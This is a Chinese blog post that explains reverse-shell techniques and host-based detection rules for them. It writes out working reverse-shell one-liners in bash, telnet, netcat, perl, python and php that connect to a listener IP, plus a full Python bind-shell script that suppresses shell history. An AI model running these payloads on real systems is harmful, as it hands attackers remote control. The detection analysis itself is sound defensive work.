反弹shell的实现方式和检测方法

最新推荐文章于 2024-06-18 13:31:26 发布
最新推荐文章于 2024-06-18 13:31:26 发布
阅读量4.3k 收藏 3
点赞数 1
分类专栏: linux security 文章标签: security linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jw915086731/article/details/85246403
版权

我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。

现在针对一些网络上反弹shell实例作说明:

 

  1. 反弹shell

现在针对一些网络上反弹shell实例作说明:

实例1,Bash反弹:

Bash反弹,远程主机监听端口:

nc -lvp 7777

被入侵的机器反弹shell命令如下:

bash -i >& /dev/tcp/192.168.7.61/7777 0>&1

 

目标机执行后的结果如下:

创建了一个常住进程“bash -i”, 它的得0和1文件描述符都指向socket。

匹配规则:bash进程的0,和1文件描述符指向socket

 

 

实例2,telnet反弹:

 

远程主机监听端口:

nc -lvvp 4444

nc -lvvp 5555

 

被入侵的机器反弹shell命令如下:

telnet 192.168.7.61 4444 | /bin/bash | telnet 192.168.7.61 5555

 

目标机执行后的结果如下:

创建了bash进程,0和1描述符都指向了pipe,这两个pipe关联到两个telnet进程上。两个telent创建了socket外联。

匹配规则:bash进程的0,和1文件描述符指向pipe

 

 

实例3,nc(netcat)反弹:

 

远程主机监听端口:

nc -lvvp 4444

 

被入侵的机器反弹shell命令如下:

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.61 4444 >/tmp/f

 

 

目标机执行后的结果如下:

创建了bash进程,0和1描述符都指向了pipe,这两个pipe关联到文件和nc上。

匹配规则:bash进程的0,和1文件描述符指向pipe

 

实例4,perl反弹:

 

远程主机监听端口:

nc -lvvp 4444

 

被入侵的机器反弹shell命令如下:

perl -e 'use Socket;$i="192.168.7.61";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

目标机执行后的结果如下:

创建了dash进程,0和1描述符都指向了socket。

匹配规则:dash或者sh进程的0,和1文件描述符指向socket

 

实例5,Python反弹:

 

远程主机监听端口:

nc -lvvp 4444

 

被入侵的机器反弹shell命令如下:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.61",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

 

 

目标机执行后的结果如下:

创建了bash进程,0和1描述符都指向了socket。

匹配规则:bash的0,和1文件描述符指向socket

 

 

实例6,php反弹:

 

远程主机监听端口:

nc -lvvp 4444

 

被入侵的机器反弹shell命令如下:

php -r '$sock=fsockopen("192.168.7.61",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

 

目标机执行后的结果如下:

创建了bash和dash进程,0和1描述符都指向了socket。

匹配规则:bash或dash进程的0,和1文件描述符指向socket

 

实例7,受害机主动监听:

 

被入侵监听端口:

#!/usr/bin/python2

"""

Python Bind TCP PTY Shell - testing version

infodox - insecurety.net (2013)

Binds a PTY to a TCP port on the host it is ran on.

"""

import os

import pty

import socket

 

lport = 31337 # XXX: CHANGEME

 

def main():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.bind(('0.0.0.0', lport))

    s.listen(1)

    (rem, addr) = s.accept()

    os.dup2(rem.fileno(),0)

    os.dup2(rem.fileno(),1)

    os.dup2(rem.fileno(),2)

    os.putenv("HISTFILE",'/dev/null')

    pty.spawn("/bin/bash")

    s.close()

      

if __name__ == "__main__":

    main()

黑客主机机器主动连接如下:

telnet 192.168.7.6 31337

 

 

目标机执行后的结果如下:

接受连接后:

进程python的0和1变成socket:

Bash进程3和4是socket。

匹配规则:python进程的0,和1文件描述符指向socket

 

总结

归纳起来,就是具备执行环境的文件如果0和1文件描述符都关联到socket或者pipe,就认为它是反弹shell。

常用的执行环境如下:

Bash, dash, sh, python, php, perl等。

debugkernel
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于主机的反弹shell检测思路
SHELLCODE_8BIT的博客
03-16 2141
前言 难免有时候网站会存在命令执行、代码执行等漏洞可能被黑客反弹shell,如何第一时间发现反弹shell特征,kill掉相应进程,保护主机安全呢? 本文主要探究一下主机反弹shell有哪些特征,为HIDS检测主机反弹shell行为提供一些思路。 类型一 bash反弹 先从最常规的开始举个例子。 bash -i >& /dev/tcp/ip/port 0>&1 原理简单说一下,本地打开bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程 &g
Linux反弹shell各种语言实现
SHELLCODE_8BIT的博客
04-22 2154
C编写实现Linux反弹shell [ Mi1k7ea ] https://github.com/pH-T/go-revshell https://github.com/vay3t/go-nc
提权学习:反弹shell实现方式检测方法
bylfsj的博客
10-15 979
我所理解的反弹shell,是外部人员通过we...
反弹shell检测的一些思路
最新发布
2401_84466225的博客
06-18 946
反弹shell是攻击者常用的手段之一,通过反弹Shell,攻击者可以绕过防火墙,获取目标系统的shell访问权限,进行后续的恶意操作。因此,及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段,探讨检测的思路以及简单的代码实现
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmd的shell
weixin_39942474的博客
05-22 742
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
入侵检测——如何实现反弹shell检测
qq_42009262的博客
03-24 2653
如何实现反弹shell检测
渗透测试-window反弹shell
lza20001103的博客
05-11 4409
window反弹shell
反弹shell资源:Rust实现的简单反弹Shell例子
05-18
使用Rust来实现反弹Shell,可以确保代码的安全性和效率。 反弹Shell的基本工作原理是:攻击者首先在目标系统上植入一个后门,该后门会在启动时连接回攻击者的控制端。当这个连接成功建立时,攻击者就可以通过这个...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
为了更好地理解和掌握反弹shell,作者通过思维导图进行了框架整理,这有助于读者系统地了解各种反弹shell命令的原理、使用场景及检测方案。 4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹...
lonely-shell - Go语言实现反弹Shell后门.zip
07-18
“lonely-shell”项目是基于Go语言实现反弹Shell后门,其代码结构简洁,易于理解和扩展。Go语言的强类型、内存管理和并发特性使得它非常适合编写这类系统级工具。在“lonely-shell-master”目录下,我们可以看到...
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
【机器学习】基于机器学习的反弹shell命令识别
一个程序员
12-03 810
本文介绍一个基于机器学习识别反弹shell的项目。 在主机安全检测中,一般是采用基于原理的方式识别反弹shell, 通过判断socket通信相关特征,可以准确地识别到主机中的反弹shell。 但是在容器场景下,检测反弹shell 的能力,可能会受到容器网络模式的限制,在容器默认运行的bridge 模式下, 是很难通过基于原理的方式识别反弹shell的。bridge模式 反弹shell 参考资料https://xz.aliyun.com/t/6727https://help.aliyun.com/docu
webshell反弹shell的区别与防御
redwand的博客
05-11 6537
linux服务器的渗透测试过程中,我们在getshell得到一个低权限的webshell后,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后进一步进行提权。那么,什么是交互式shell和非交互式shell呢,他们又是如何与靶机进行通信的呢?相信网络上的文章大家也看到很多,今天我们不说理论,先以一个抓包实验来验证一下。
路由器漏洞挖掘之栈溢出 - 反弹shell的payload构造
abc380620175的博客
03-22 914
前言 前一篇讲到了 ROP 链的构造,最后直接使用调用 execve 函数的 shellcode 就可以直接 getshell,但是实际路由器溢出的情况下都不会那么简单。 这里再看一道 DVRF 的题,这道题是 pwnable/ShellCode_Required 下的 socket_bof。 漏洞分析 直接查看源码: #include <sys/types.h> #incl...
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2356
常用反弹shell技术汇总
以Python写的 反弹工具
diaoqin7781的博客
04-24 245
python 反弹shell 我们知道,一般的反弹shell 可以直接使用 base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令 nc nmap 等等。。。。 nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道我针对了php 的文件...
CTF中的命令执行绕过
蚁景网安学院
04-21 3248
作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5832
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
linux反弹shell总结
redwand的博客
02-22 1422
本文总结了Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
Linux系统下Perl反弹Shell脚本解析
提供的脚本是一个在Linux环境中实现权限提升并反弹shell的Perl脚本,常用于渗透测试和安全研究,以检查系统的防护措施。" 在Linux环境下,系统安全是至关重要的,它涉及到服务器的稳定运行和数据的安全。此脚本主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值